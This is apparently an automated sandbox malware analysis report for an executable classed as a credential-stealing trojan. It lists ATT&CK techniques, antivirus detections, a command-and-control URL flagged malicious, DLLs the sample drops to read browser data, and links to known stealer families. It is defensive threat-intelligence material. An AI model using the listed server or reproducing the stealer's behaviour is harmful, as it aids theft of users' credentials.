                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_609254B1 sqlite3_bind_zeroblob,1_2_609254B1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6090F435 sqlite3_bind_parameter_index,1_2_6090F435
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_609255D4 sqlite3_bind_text16,1_2_609255D4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_609255FF sqlite3_bind_text,1_2_609255FF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_60925686 sqlite3_bind_int64,1_2_60925686
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_609256E5 sqlite3_bind_int,1_2_609256E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6092562A sqlite3_bind_blob,1_2_6092562A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_60925655 sqlite3_bind_null,1_2_60925655
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6092570B sqlite3_bind_double,1_2_6092570B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_60925778 sqlite3_bind_value,1_2_60925778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6090577D sqlite3_bind_parameter_name,1_2_6090577D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6090576B sqlite3_bind_parameter_count,1_2_6090576B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 1_2_6090EAE5 sqlite3_transfer_bindings,1_2_6090EAE5

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
                  Valid Accounts21
                  Native API                  		1
                  DLL Side-Loading                  		311
                  Process Injection                  		1
                  Masquerading                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Screen Capture                  		Exfiltration Over Other Network Medium2
                  Encrypted Channel                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
                  Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading                  		1
                  Virtualization/Sandbox Evasion                  		LSASS Memory131
                  Security Software Discovery                  		Remote Desktop Protocol1
                  Archive Collected Data                  		Exfiltration Over Bluetooth3
                  Ingress Tool Transfer                  		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
                  Domain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                  Disable or Modify Tools                  		Security Account Manager1
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin Shares3
                  Data from Local System                  		Automated Exfiltration3
                  Non-Application Layer Protocol                  		Data Encrypted for ImpactDNS ServerEmail Addresses
                  Local AccountsCronLogin HookLogin Hook311
                  Process Injection                  		NTDS1
                  Account Discovery                  		Distributed Component Object ModelInput CaptureTraffic Duplication23
                  Application Layer Protocol                  		Data DestructionVirtual Private ServerEmployee Names
                  Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information                  		LSA Secrets1
                  System Owner/User Discovery                  		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
                  Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Obfuscated Files or Information                  		Cached Domain Credentials3
                  File and Directory Discovery                  		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
                  External Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSync135
                  System Information Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  4bVsmYiuXy.exe54%VirustotalBrowse
                  4bVsmYiuXy.exe100%AviraTR/Dropper.MSIL.Gen
                  4bVsmYiuXy.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\ProgramData\freebl3.dll0%VirustotalBrowse
                  C:\ProgramData\mozglue.dll0%VirustotalBrowse
                  C:\ProgramData\msvcp140.dll0%VirustotalBrowse
                  C:\ProgramData\nss3.dll0%VirustotalBrowse
                  C:\ProgramData\softokn3.dll0%VirustotalBrowse
                  C:\ProgramData\vcruntime140.dll0%VirustotalBrowse

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://ocsp.thawte.com00%URL Reputationsafe
                  http://www.mozilla.com00%URL Reputationsafe
                  http://91.92.250.149/gate.phpL0%Avira URL Cloudsafe
                  http://91.92.250.149/request/100%Avira URL Cloudmalware
                  http://91.92.250.149/gate.php100%Avira URL Cloudmalware
                  91.92.250.149/gate.php100%Avira URL Cloudmalware
                  http://91.92.250.149/request100%Avira URL Cloudmalware
                  http://91.92.250.149/gate.php60%Avira URL Cloudsafe
                  http://91.92.250.149/request6%VirustotalBrowse
                  91.92.250.149/gate.php14%VirustotalBrowse
                  http://91.92.250.149/gate.php14%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://91.92.250.149/gate.phptrue
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  91.92.250.149/gate.phptrue
                  • 14%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		low
                  http://91.92.250.149/requesttrue
                  • 6%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://ac.ecosia.org/autocomplete?q=0HDJEU3W.1.drfalse
                    		high
                    https://duckduckgo.com/chrome_newtab0HDJEU3W.1.drfalse
                      		high
                      http://www.mozilla.com/en-US/blocklist/mozglue.dll.1.drfalse
                        		high
                        https://duckduckgo.com/ac/?q=0HDJEU3W.1.drfalse
                          		high
                          https://www.google.com/images/branding/product/ico/googleg_lodp.ico0HDJEU3W.1.drfalse
                            		high
                            http://crl.thawte.com/ThawteTimestampingCA.crl0AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686423139.000000000FBDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, softokn3.dll.1.drfalse
                              		high
                              http://91.92.250.149/request/AddInProcess32.exe, 00000001.00000002.1678827936.0000000000EC1000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.92.250.149/gate.phpLAddInProcess32.exe, 00000001.00000002.1678827936.0000000000EC1000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallZMGDJECB.1.drfalse
                                		high
                                http://ocsp.thawte.com0AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686423139.000000000FBDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, softokn3.dll.1.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0HDJEU3W.1.drfalse
                                  		high
                                  http://www.mozilla.com0AddInProcess32.exe, 00000001.00000002.1678827936.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686646673.000000000FE84000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000001.00000002.1686423139.000000000FBDF000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, softokn3.dll.1.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://91.92.250.149/gate.php6AddInProcess32.exe, 00000001.00000002.1678827936.0000000000EC1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0HDJEU3W.1.drfalse
                                    		high
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0HDJEU3W.1.drfalse
                                      		high
                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ZMGDJECB.1.drfalse
                                        		high
                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesZMGDJECB.1.drfalse
                                          		high
                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17ZMGDJECB.1.drfalse
                                            		high
                                            https://www.ecosia.org/newtab/0HDJEU3W.1.drfalse
                                              		high
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0HDJEU3W.1.drfalse
                                                		high

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                91.92.250.149
                                                		unknownBulgaria
                                                		34368THEZONEBGtrue

                                                General Information

                                                Joe Sandbox version:38.0.0 Ammolite
                                                Analysis ID:1363447
                                                Start date and time:2023-12-16 18:16:07 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 3m 45s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:6
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:4bVsmYiuXy.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:bffa608e609a6e2f67d01bb5f64ba70a.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@8/14@0/1
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 99%
                                                • Number of executed functions: 83
                                                • Number of non-executed functions: 91
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Stop behavior analysis, all processes terminated

                                                Warnings

                                                • Exclude process from analysis (whitelisted): dllhost.exe
                                                • Excluded IPs from analysis (whitelisted): 20.12.23.50
                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtOpenFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                18:16:54API Interceptor1x Sleep call for process: AddInProcess32.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                91.92.250.149kEIG9jIuD2.exeGet hashmaliciousRedLineBrowse
                                                • 91.92.250.149/AutoRuns.exe

                                                Domains

                                                No context

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                THEZONEBGGblAOV3u6C.exeGet hashmaliciousAveMaria, UACMeBrowse
                                                • 91.92.251.22
                                                Soucring_Tender_Sheet.xlsxGet hashmaliciousAveMaria, UACMeBrowse
                                                • 91.92.251.22
                                                l7rBnjCcPA.exeGet hashmaliciousStealc, VidarBrowse
                                                • 91.92.249.226
                                                gs0e9zuvJl.exeGet hashmaliciousRisePro Stealer, SmokeLoader, VidarBrowse
                                                • 91.92.249.253
                                                Or0dzqpsOa.exeGet hashmaliciousRisePro Stealer, SmokeLoader, VidarBrowse
                                                • 91.92.249.253
                                                mQ1UfmBFtz.exeGet hashmaliciousRisePro Stealer, SmokeLoader, VidarBrowse
                                                • 91.92.249.253
                                                ZOe53Zwi1a.exeGet hashmaliciousRisePro Stealer, SmokeLoader, VidarBrowse
                                                • 91.92.249.253
                                                vZ3cyoSmwf.exeGet hashmaliciousRisePro Stealer, SmokeLoader, VidarBrowse
                                                • 91.92.249.253
                                                FTq09uH032.exeGet hashmaliciousRisePro Stealer, SmokeLoader, VidarBrowse
                                                • 91.92.249.253
                                                gPKPlPjPJB.exeGet hashmaliciousRisePro Stealer, SmokeLoader, VidarBrowse
                                                • 91.92.249.253
                                                R3tT6rImOp.exeGet hashmaliciousRisePro Stealer, SmokeLoader, VidarBrowse
                                                • 91.92.249.253
                                                NpXHmOjKt2.exeGet hashmaliciousGlupteba, LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Stealc, VidarBrowse
                                                • 91.92.249.253
                                                bbsEmoWKZS.exeGet hashmaliciousRisePro Stealer, SmokeLoader, VidarBrowse
                                                • 91.92.249.253
                                                58H94d1ufq.exeGet hashmaliciousRisePro Stealer, SmokeLoader, VidarBrowse
                                                • 91.92.249.253
                                                INl1GEhFQc.exeGet hashmaliciousRisePro Stealer, SmokeLoader, VidarBrowse
                                                • 91.92.249.253
                                                ri07ROEZg8.exeGet hashmaliciousRisePro Stealer, SmokeLoader, VidarBrowse
                                                • 91.92.249.253
                                                X9TRynCrTi.exeGet hashmaliciousLummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Stealc, Vidar, zgRATBrowse
                                                • 91.92.249.253
                                                AE8WD14i9X.exeGet hashmaliciousRisePro Stealer, SmokeLoader, VidarBrowse
                                                • 91.92.249.253
                                                V5QUnyupLZ.exeGet hashmaliciousRisePro Stealer, SmokeLoader, VidarBrowse
                                                • 91.92.249.253
                                                12hMgY5GVz.exeGet hashmaliciousLummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Stealc, Vidar, zgRATBrowse
                                                • 91.92.249.253

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\ProgramData\freebl3.dllSecuriteInfo.com.Win32.Evo-gen.25423.22998.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                  PmX1jHdUnS.exeGet hashmaliciousOski Stealer, VidarBrowse
                                                    INV_34897003.pif.exeGet hashmaliciousMars Stealer, VidarBrowse
                                                      cBMUYyAn60.exeGet hashmaliciousOski Stealer, VidarBrowse
                                                        file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                          file.exeGet hashmaliciousPrivateLoaderBrowse
                                                            file.exeGet hashmaliciousPrivateLoaderBrowse
                                                              file.exeGet hashmaliciousPrivateLoaderBrowse
                                                                file.exeGet hashmaliciousPrivateLoaderBrowse
                                                                  file.exeGet hashmaliciousPrivateLoaderBrowse
                                                                    file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                      file.exeGet hashmaliciousPrivateLoaderBrowse
                                                                        file.exeGet hashmaliciousPrivateLoaderBrowse
                                                                          file.exeGet hashmaliciousPrivateLoaderBrowse
                                                                            file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                                                              file.exeGet hashmaliciousPrivateLoaderBrowse
                                                                                file.exeGet hashmaliciousClipboard Hijacker, PrivateLoaderBrowse
                                                                                  file.exeGet hashmaliciousPrivateLoaderBrowse
                                                                                    file.exeGet hashmaliciousPrivateLoaderBrowse
                                                                                      file.exeGet hashmaliciousPrivateLoaderBrowse

                                                                                        Created / dropped Files

                                                                                        C:\ProgramData\freebl3.dll

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):334288
                                                                                        Entropy (8bit):6.807000203861606
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
                                                                                        MD5:EF2834AC4EE7D6724F255BEAF527E635
                                                                                        SHA1:5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
                                                                                        SHA-256:A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
                                                                                        SHA-512:C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                        Joe Sandbox View:
                                                                                        • Filename: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, Detection: malicious, Browse
                                                                                        • Filename: PmX1jHdUnS.exe, Detection: malicious, Browse
                                                                                        • Filename: INV_34897003.pif.exe, Detection: malicious, Browse
                                                                                        • Filename: cBMUYyAn60.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\mozglue.dll

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):137168
                                                                                        Entropy (8bit):6.78390291752429
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
                                                                                        MD5:8F73C08A9660691143661BF7332C3C27
                                                                                        SHA1:37FA65DD737C50FDA710FDBDE89E51374D0C204A
                                                                                        SHA-256:3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
                                                                                        SHA-512:0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\msvcp140.dll

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):440120
                                                                                        Entropy (8bit):6.652844702578311
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                                                                        MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                                                                        SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                                                                        SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                                                                        SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\nss3.dll

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):1246160
                                                                                        Entropy (8bit):6.765536416094505
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
                                                                                        MD5:BFAC4E3C5908856BA17D41EDCD455A51
                                                                                        SHA1:8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
                                                                                        SHA-256:E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
                                                                                        SHA-512:2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\softokn3.dll

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):144848
                                                                                        Entropy (8bit):6.539750563864442
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
                                                                                        MD5:A2EE53DE9167BF0D6C019303B7CA84E5
                                                                                        SHA1:2A3C737FA1157E8483815E98B666408A18C0DB42
                                                                                        SHA-256:43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
                                                                                        SHA-512:45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                        C:\ProgramData\vcruntime140.dll

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):83784
                                                                                        Entropy (8bit):6.890347360270656
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                                                        MD5:7587BF9CB4147022CD5681B015183046
                                                                                        SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                                                        SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                                                        SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):32768
                                                                                        Entropy (8bit):0.017262956703125623
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                        Malicious:false
                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\Desktop\0HDJEU3W

